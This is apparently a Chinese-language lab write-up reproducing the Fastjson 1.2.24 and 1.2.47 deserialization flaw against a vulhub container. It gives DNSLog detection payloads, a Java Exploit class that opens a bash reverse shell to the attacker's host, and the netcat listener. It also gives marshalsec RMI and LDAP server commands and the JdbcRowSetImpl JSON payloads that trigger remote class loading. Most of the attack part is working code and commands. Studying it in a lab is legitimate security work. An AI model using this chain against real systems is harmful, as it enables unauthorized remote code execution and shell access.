Fastjson反序列化复现

基础知识

fastjson 是一款阿里的开源java库，用来实现java 对象与json字符串之间的相互转化

反序列化常用的两种利用方式，一种是基于rmi(Java远程方法调用)，一种是基于ldap。

@type处可以做反序列化 做反序列化时会调用对象的set方法 使用 JdbcRowSetImpl 从远程服务器上加载服务器端的类 从而执行恶意代码

漏洞复现

环境

靶机 vulhub-fastjson-1.2.24

ip：192.168.20.128

kali：192.168.20.129

docker-compose up -d 访问192.168.20.128:8090

漏洞检测

DNSLog回显

构造POST请求包，fastjson可以解析payload中val的值，如果dnslog有回显即为fastjson

{"a":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}}
{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}
{"@type":"java.net.Inet6Address","val":"xxx.dnslog.cn"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"xxx.dnslog.cn"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"xxx.dnslog.cn"}}""}
{{"@type":"java.net.URL","val":"xxx.dnslog.cn"}:"aaa"}
Set[{"@type":"java.net.URL","val":"xxx.dnslog.cn"}]
Set[{"@type":"java.net.URL","val":"xxx.dnslog.cn"}
{{"@type":"java.net.URL","val":"xxx.dnslog.cn"}:0

RMI方式

思路

1. 靶机为vulhub8090端口
2. kali上利用python开启web服务，并把编译后的exp放到里面
3. kali 8001端口开启 rmi 服务（rmi 远程方法调用 A主机去调用B主机上的exp.class方法）
4. kali 8888端口监听反弹的shell

使用kali搭建一个临时web服务

python3 -m http.server 9999

编译生产exp,放在web目录下

Exploit.java

public class Exploit {
    public Exploit(){
        try{
            Runtime.getRuntime().exec("/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.20.129/8888 0>&1");
        }catch(Exception e){
            e.printStackTrace();
        }
    }
    public static void main(String[] argv){
        Exploit e = new Exploit();
    }
}

进行编译javac Exploit.java生成Exploit.class

把编译好的Exploit.class放在kali上

kali监听8888端口

nc -lvvp 8888

启动RMI服务

使用marshalsec项目，启动RMI服务，监听8001端口并加载远程类Exploit.class(marshalsec和编译后的Exploit.class放在同一目录下)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.20.129:9999/#Exploit" 8001

kali@kali2020:~/Common/fastjson$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.20.129:9999/#Exploit" 8001 Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

• Opening JRMP listener on 8001 Have connection from /192.168.20.128:49126 Reading message... Is RMI.lookup call for Exploit 2 Sending remote classloading stub targeting http://192.168.20.129:9999/Exploit.class WARNING: An illegal reflective access operation has occurred WARNING: Illegal reflective access by marshalsec.util.Reflections (file:/home/kali/Common/fastjson/marshalsec-0.0.3-SNAPSHOT-all.jar) to field com.sun.jndi.rmi.registry.ReferenceWrapper.wrappee WARNING: Please consider reporting this to the maintainers of marshalsec.util.Reflections WARNING: Use --illegal-access=warn to enable warnings of further illegal reflective access operations WARNING: All illegal access operations will be denied in a future release Closing connection

原因貌似是因为java版本过高，这里默认使用的我昨天刚安装的javac11,换一个低版本的javac去进行编译,但是还是无法反弹shell.

查了半个下午，最终发现是因为kali 的java版本问题，kali原java版本为java11,然后安装了java8 再去开启rmi服务就正常了

成功反弹shell

payload

1.2.24

{
    "a":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.20.129:8001/Exploit",
        "autoCommit":true
    }
}

1.2.47

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.20.129:8001/Exploit",
        "autoCommit":true
    }
}

LDAP方式

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.20.129:9999/#Exploit" 8002

{
    "a":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.20.129:8002/Exploit",
        "autoCommit":true
    }
}

Reference

https://www.cnblogs.com/chen-w/p/14735881.html

https://blog.csdn.net/weixin_45556536/article/details/109486621

https://choge.top/2020/10/12/fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

https://www.cnblogs.com/hei-zi/p/13274272.html

https://www.yuque.com/naraku/blog/leak-fastjson